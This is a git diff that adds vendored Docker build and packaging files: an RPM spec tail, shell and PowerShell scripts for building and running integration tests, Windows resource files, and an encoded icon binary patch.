$RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect/dockerfile.vim +install -p -m 644 contrib/syntax/vim/syntax/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax/dockerfile.vim + +# add nano +install -d $RPM_BUILD_ROOT/usr/share/nano +install -p -m 644 contrib/syntax/nano/Dockerfile.nanorc 
$RPM_BUILD_ROOT/usr/share/nano/Dockerfile.nanorc + +# list files owned by the package here +%files +%doc AUTHORS CHANGELOG.md CONTRIBUTING.md LICENSE MAINTAINERS NOTICE README.md +/%{_bindir}/docker +/%{_bindir}/dockerd +/%{_bindir}/docker-containerd +/%{_bindir}/docker-containerd-shim +/%{_bindir}/docker-containerd-ctr +/%{_bindir}/docker-proxy +/%{_bindir}/docker-runc +/%{_bindir}/docker-init +/%{_sysconfdir}/udev/rules.d/80-docker.rules +%if 0%{?is_systemd} +/%{_unitdir}/docker.service +%else +%config(noreplace,missingok) /etc/sysconfig/docker +/%{_initddir}/docker +%endif +/usr/share/bash-completion/completions/docker +/usr/share/zsh/vendor-completions/_docker +/usr/share/fish/vendor_completions.d/docker.fish +%doc +/%{_mandir}/man1/* +/%{_mandir}/man5/* +/%{_mandir}/man8/* +/usr/share/vim/vimfiles/doc/dockerfile.txt +/usr/share/vim/vimfiles/ftdetect/dockerfile.vim +/usr/share/vim/vimfiles/syntax/dockerfile.vim +/usr/share/nano/Dockerfile.nanorc + +%post +%if 0%{?is_systemd} +%systemd_post docker +%else +# This adds the proper /etc/rc*.d links for the script +/sbin/chkconfig --add docker +%endif +if ! 
getent group docker > /dev/null; then + groupadd --system docker +fi + +%preun +%if 0%{?is_systemd} +%systemd_preun docker +%else +if [ $1 -eq 0 ] ; then + /sbin/service docker stop >/dev/null 2>&1 + /sbin/chkconfig --del docker +fi +%endif + +%postun +%if 0%{?is_systemd} +%systemd_postun_with_restart docker +%else +if [ "$1" -ge "1" ] ; then + /sbin/service docker condrestart >/dev/null 2>&1 || : +fi +%endif + +%changelog diff --git a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch new file mode 100644 index 0000000000..73955392d0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch @@ -0,0 +1,69 @@ +#!/bin/bash +set -e + +docker-version-osarch() { + local target="$1" # "Client" or "Server" + local fmtStr="{{.${target}.Os}}/{{.${target}.Arch}}" + if docker version -f "$fmtStr" 2>/dev/null; then + # if "docker version -f" works, let's just use that! + return + fi + docker version | awk ' + $1 ~ /^(Client|Server):$/ { section = 0 } + $1 == "'"$target"':" { section = 1; next } + section && $1 == "OS/Arch:" { print $2 } + + # old versions of Docker + $1 == "OS/Arch" && $2 == "('"${target,,}"'):" { print $3 } + ' +} + +# Retrieve OS/ARCH of docker daemon, e.g. 
linux/amd64 +export DOCKER_ENGINE_OSARCH="$(docker-version-osarch 'Server')" +export DOCKER_ENGINE_GOOS="${DOCKER_ENGINE_OSARCH%/*}" +export DOCKER_ENGINE_GOARCH="${DOCKER_ENGINE_OSARCH##*/}" +DOCKER_ENGINE_GOARCH=${DOCKER_ENGINE_GOARCH:=amd64} + +# and the client, just in case +export DOCKER_CLIENT_OSARCH="$(docker-version-osarch 'Client')" +export DOCKER_CLIENT_GOOS="${DOCKER_CLIENT_OSARCH%/*}" +export DOCKER_CLIENT_GOARCH="${DOCKER_CLIENT_OSARCH##*/}" +DOCKER_CLIENT_GOARCH=${DOCKER_CLIENT_GOARCH:=amd64} + +# Retrieve the architecture used in contrib/builder/(deb|rpm)/$PACKAGE_ARCH/ +PACKAGE_ARCH='amd64' +case "${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" in + arm) + PACKAGE_ARCH='armhf' + ;; + arm64) + PACKAGE_ARCH='aarch64' + ;; + amd64|ppc64le|s390x) + PACKAGE_ARCH="${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" + ;; + *) + echo >&2 "warning: not sure how to convert '$DOCKER_ENGINE_GOARCH' to a 'Docker' arch, assuming '$PACKAGE_ARCH'" + ;; +esac +export PACKAGE_ARCH + +DOCKERFILE='Dockerfile' +TEST_IMAGE_NAMESPACE= +case "$PACKAGE_ARCH" in + amd64) + case "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" in + windows) + DOCKERFILE='Dockerfile.windows' + ;; + solaris) + DOCKERFILE='Dockerfile.solaris' + ;; + esac + ;; + *) + DOCKERFILE="Dockerfile.$PACKAGE_ARCH" + TEST_IMAGE_NAMESPACE="$PACKAGE_ARCH" + ;; +esac +export DOCKERFILE TEST_IMAGE_NAMESPACE diff --git a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs new file mode 100644 index 0000000000..e71a30ae81 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs @@ -0,0 +1,23 @@ +#!/bin/bash +set -e + +if ! 
docker inspect emptyfs &> /dev/null; then + # let's build a "docker save" tarball for "emptyfs" + # see https://github.com/docker/docker/pull/5262 + # and also https://github.com/docker/docker/issues/4242 + dir="$DEST/emptyfs" + mkdir -p "$dir" + ( + cd "$dir" + echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > repositories + mkdir -p 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 + ( + cd 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 + echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json + echo '1.0' > VERSION + tar -cf layer.tar --files-from /dev/null + ) + ) + ( set -x; tar -cC "$dir" . 
| docker load ) + rm -rf "$dir" +fi diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen b/vendor/github.com/docker/docker/hack/make/.go-autogen new file mode 100644 index 0000000000..4d26052bb7 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.go-autogen @@ -0,0 +1,86 @@ +#!/bin/bash + +rm -rf autogen + +source hack/dockerfile/binaries-commits + +cat > dockerversion/version_autogen.go < dockerversion/version_autogen_unix.go < + +param( + [Parameter(Mandatory=$true)][string]$CommitString, + [Parameter(Mandatory=$true)][string]$DockerVersion +) + +$ErrorActionPreference = "Stop" + +# Utility function to get the build date/time in UTC +Function Get-BuildDateTime() { + return $(Get-Date).ToUniversalTime() +} + +try { + $buildDateTime=Get-BuildDateTime + + if (Test-Path ".\autogen") { + Remove-Item ".\autogen" -Recurse -Force | Out-Null + } + + $fileContents = ' +// +build autogen + +// Package dockerversion is auto-generated at build-time +package dockerversion + +// Default build-time variable for library-import. +// This file is overridden on build with build-time informations. 
+const ( + GitCommit string = "'+$CommitString+'" + Version string = "'+$DockerVersion+'" + BuildTime string = "'+$buildDateTime+'" +) + +// AUTOGENERATED FILE; see hack\make\.go-autogen.ps1 +' + + # Write the file without BOM + $outputFile="$(pwd)\dockerversion\version_autogen.go" + if (Test-Path $outputFile) { Remove-Item $outputFile } + [System.IO.File]::WriteAllText($outputFile, $fileContents, (New-Object System.Text.UTF8Encoding($False))) + + New-Item -ItemType Directory -Path "autogen\winresources\tmp" | Out-Null + New-Item -ItemType Directory -Path "autogen\winresources\docker" | Out-Null + New-Item -ItemType Directory -Path "autogen\winresources\dockerd" | Out-Null + Copy-Item "hack\make\.resources-windows\resources.go" "autogen\winresources\docker" + Copy-Item "hack\make\.resources-windows\resources.go" "autogen\winresources\dockerd" + + # Generate a version in the form major,minor,patch,build + $versionQuad=$DockerVersion -replace "[^0-9.]*" -replace "\.", "," + + # Compile the messages + windmc hack\make\.resources-windows\event_messages.mc -h autogen\winresources\tmp -r autogen\winresources\tmp + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile event message resources" } + + # If you really want to understand this madness below, search the Internet for powershell variables after verbatim arguments... Needed to get double-quotes passed through to the compiler options. + # Generate the .syso files containing all the resources and manifest needed to compile the final docker binaries. Both 32 and 64-bit clients. 
+ $env:_ag_dockerVersion=$DockerVersion + $env:_ag_gitCommit=$CommitString + + windres -i hack/make/.resources-windows/docker.rc -o autogen/winresources/docker/rsrc_amd64.syso -F pe-x86-64 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\" + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile client 64-bit resources" } + + windres -i hack/make/.resources-windows/docker.rc -o autogen/winresources/docker/rsrc_386.syso -F pe-i386 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\" + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile client 32-bit resources" } + + windres -i hack/make/.resources-windows/dockerd.rc -o autogen/winresources/dockerd/rsrc_amd64.syso -F pe-x86-64 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\" + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile daemon resources" } +} +Catch [Exception] { + # Throw the error onto the caller to display errors. 
We don't expect this script to be called directly + Throw ".go-autogen.ps1 failed with error $_" +} +Finally { + Remove-Item .\autogen\winresources\tmp -Recurse -Force -ErrorAction SilentlyContinue | Out-Null + $env:_ag_dockerVersion="" + $env:_ag_gitCommit="" +} diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup new file mode 100644 index 0000000000..0efde717fc --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup @@ -0,0 +1,7 @@ +#!/bin/bash +set -e + +bundle .detect-daemon-osarch +if [ $DOCKER_ENGINE_GOOS != "windows" ]; then + bundle .ensure-emptyfs +fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start new file mode 100644 index 0000000000..b96979bdb2 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start @@ -0,0 +1,116 @@ +#!/bin/bash + +# see test-integration-cli for example usage of this script + +base="$ABS_DEST/.." +export PATH="$base/binary-client:$base/binary-daemon:$base/dynbinary-client:$base/dynbinary-daemon:$PATH" + +if ! command -v docker &> /dev/null; then + echo >&2 'error: binary-client or dynbinary-client must be run before .integration-daemon-start' + false +fi + +# This is a temporary hack for split-binary mode. It can be removed once +# https://github.com/docker/docker/pull/22134 is merged into docker master +if [ "$(go env GOOS)" = 'windows' ]; then + return +fi + +if [ -z "$DOCKER_TEST_HOST" ]; then + if docker version &> /dev/null; then + echo >&2 'skipping daemon start, since daemon appears to be already started' + return + fi +fi + +if ! 
command -v dockerd &> /dev/null; then + echo >&2 'error: binary-daemon or dynbinary-daemon must be run before .integration-daemon-start' + false +fi + +# intentionally open a couple bogus file descriptors to help test that they get scrubbed in containers +exec 41>&1 42>&2 + +export DOCKER_GRAPHDRIVER=${DOCKER_GRAPHDRIVER:-vfs} +export DOCKER_USERLANDPROXY=${DOCKER_USERLANDPROXY:-true} + +# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +storage_params="" +if [ -n "$DOCKER_STORAGE_OPTS" ]; then + IFS=',' + for i in ${DOCKER_STORAGE_OPTS}; do + storage_params="--storage-opt $i $storage_params" + done + unset IFS +fi + +# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +extra_params="" +if [ "$DOCKER_REMAP_ROOT" ]; then + extra_params="--userns-remap $DOCKER_REMAP_ROOT" +fi + +if [ "$DOCKER_EXPERIMENTAL" ]; then + echo >&2 '# DOCKER_EXPERIMENTAL is set: starting daemon with experimental features enabled! ' + extra_params="$extra_params --experimental" +fi + +if [ -z "$DOCKER_TEST_HOST" ]; then + # Start apparmor if it is enabled + if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then + # reset container variable so apparmor profile is applied to process + # see https://github.com/docker/libcontainer/blob/master/apparmor/apparmor.go#L16 + export container="" + ( + set -x + /etc/init.d/apparmor start + ) + fi + + export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" # "pwd" tricks to make sure $DEST is an absolute path, not a relative one + ( set -x; exec \ + dockerd --debug \ + --host "$DOCKER_HOST" \ + --storage-driver "$DOCKER_GRAPHDRIVER" \ + --pidfile "$DEST/docker.pid" \ + --userland-proxy="$DOCKER_USERLANDPROXY" \ + $storage_params \ + $extra_params \ + &> "$DEST/docker.log" + ) & + # make sure that if the script exits unexpectedly, we stop this daemon we just started + trap 'bundle .integration-daemon-stop' EXIT +else + export 
DOCKER_HOST="$DOCKER_TEST_HOST" +fi + +# give it a little time to come up so it's "ready" +tries=60 +echo "INFO: Waiting for daemon to start..." +while ! docker version &> /dev/null; do + (( tries-- )) + if [ $tries -le 0 ]; then + printf "\n" + if [ -z "$DOCKER_HOST" ]; then + echo >&2 "error: daemon failed to start" + echo >&2 " check $DEST/docker.log for details" + else + echo >&2 "error: daemon at $DOCKER_HOST fails to 'docker version':" + docker version >&2 || true + # Additional Windows CI debugging as this is a common error as of + # January 2016 + if [ "$(go env GOOS)" = 'windows' ]; then + echo >&2 "Container log below:" + echo >&2 "---" + # Important - use the docker on the CI host, not the one built locally + # which is currently in our path. + ! /c/bin/docker -H=$MAIN_DOCKER_HOST logs docker-$COMMITHASH + echo >&2 "---" + fi + fi + false + fi + printf "." + sleep 2 +done +printf "\n" diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop new file mode 100644 index 0000000000..03c1b14689 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop @@ -0,0 +1,27 @@ +#!/bin/bash + +if [ ! "$(go env GOOS)" = 'windows' ]; then + trap - EXIT # reset EXIT trap applied in .integration-daemon-start + + for pidFile in $(find "$DEST" -name docker.pid); do + pid=$(set -x; cat "$pidFile") + ( set -x; kill "$pid" ) + if ! wait "$pid"; then + echo >&2 "warning: PID $pid from $pidFile had a nonzero exit code" + fi + done + + if [ -z "$DOCKER_TEST_HOST" ]; then + # Stop apparmor if it is enabled + if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then + ( + set -x + /etc/init.d/apparmor stop + ) + fi + fi +else + # Note this script is not actionable on Windows to Linux CI. 
Instead the + # DIND daemon under test is torn down by the Jenkins tear-down script + echo "INFO: Not stopping daemon on Windows CI" +fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers new file mode 100644 index 0000000000..7b73b2f140 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers @@ -0,0 +1,79 @@ +#!/bin/bash + +: ${TEST_REPEAT:=0} + +bundle_test_integration_cli() { + TESTFLAGS="$TESTFLAGS -check.v -check.timeout=${TIMEOUT} -test.timeout=360m" + go_test_dir integration-cli $DOCKER_INTEGRATION_TESTS_VERIFIED +} + +# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. +# You can use this to select certain tests to run, e.g. +# +# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit +# +# For integration-cli test, we use [gocheck](https://labix.org/gocheck), if you want +# to run certain tests on your local host, you should run with command: +# +# TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration-cli +# +go_test_dir() { + dir=$1 + precompiled=$2 + testbinary="$DEST/test.main" + testcover=() + testcoverprofile=() + ( + mkdir -p "$DEST/coverprofiles" + export DEST="$ABS_DEST" # in a subshell this is safe -- our integration-cli tests need DEST, and "cd" screws it up + if [ -z $precompiled ]; then + ensure_test_dir $1 $testbinary + fi + cd "$dir" + i=0 + while ((++i)); do + test_env "$testbinary" $TESTFLAGS + if [ $i -gt "$TEST_REPEAT" ]; then + break + fi + echo "Repeating test ($i)" + done + ) +} + +ensure_test_dir() { + ( + # make sure a test dir will compile + dir="$1" + out="$2" + echo Building test dir: "$dir" + set -xe + cd "$dir" + go test -c -o "$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" + ) +} + +test_env() { + ( + set -xe + # use "env -i" to tightly control the environment variables that bleed into the tests + env -i \ + DEST="$DEST" \ + 
DOCKER_TLS_VERIFY="$DOCKER_TEST_TLS_VERIFY" \ + DOCKER_CERT_PATH="$DOCKER_TEST_CERT_PATH" \ + DOCKER_ENGINE_GOARCH="$DOCKER_ENGINE_GOARCH" \ + DOCKER_GRAPHDRIVER="$DOCKER_GRAPHDRIVER" \ + DOCKER_USERLANDPROXY="$DOCKER_USERLANDPROXY" \ + DOCKER_HOST="$DOCKER_HOST" \ + DOCKER_REMAP_ROOT="$DOCKER_REMAP_ROOT" \ + DOCKER_REMOTE_DAEMON="$DOCKER_REMOTE_DAEMON" \ + DOCKERFILE="$DOCKERFILE" \ + GOPATH="$GOPATH" \ + GOTRACEBACK=all \ + HOME="$ABS_DEST/fake-HOME" \ + PATH="$PATH" \ + TEMP="$TEMP" \ + TEST_IMAGE_NAMESPACE="$TEST_IMAGE_NAMESPACE" \ + "$@" + ) +} diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc b/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc new file mode 100644 index 0000000000..000fb35367 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc @@ -0,0 +1,38 @@ +// Application icon +1 ICON "docker.ico" + +// Windows executable manifest +1 24 /* RT_MANIFEST */ "docker.exe.manifest" + +// Version information +1 VERSIONINFO + +#ifdef DOCKER_VERSION_QUAD +FILEVERSION DOCKER_VERSION_QUAD +PRODUCTVERSION DOCKER_VERSION_QUAD +#endif + +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "000004B0" + BEGIN + VALUE "ProductName", DOCKER_NAME + +#ifdef DOCKER_VERSION + VALUE "FileVersion", DOCKER_VERSION + VALUE "ProductVersion", DOCKER_VERSION +#endif + +#ifdef DOCKER_COMMIT + VALUE "OriginalFileName", DOCKER_COMMIT +#endif + + END + END + + BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x0000, 0x04B0 + END +END diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest new file mode 100644 index 0000000000..674bc9422b --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest @@ -0,0 +1,18 @@ + + + Docker + + + + + + + + + + + + + + + \ No newline at end of file diff --git 
a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico new file mode 100644 index 0000000000000000000000000000000000000000..c6506ec8dbd8e295d98a084412e9d2c358a6ba39 GIT binary patch literal 370070 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

-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 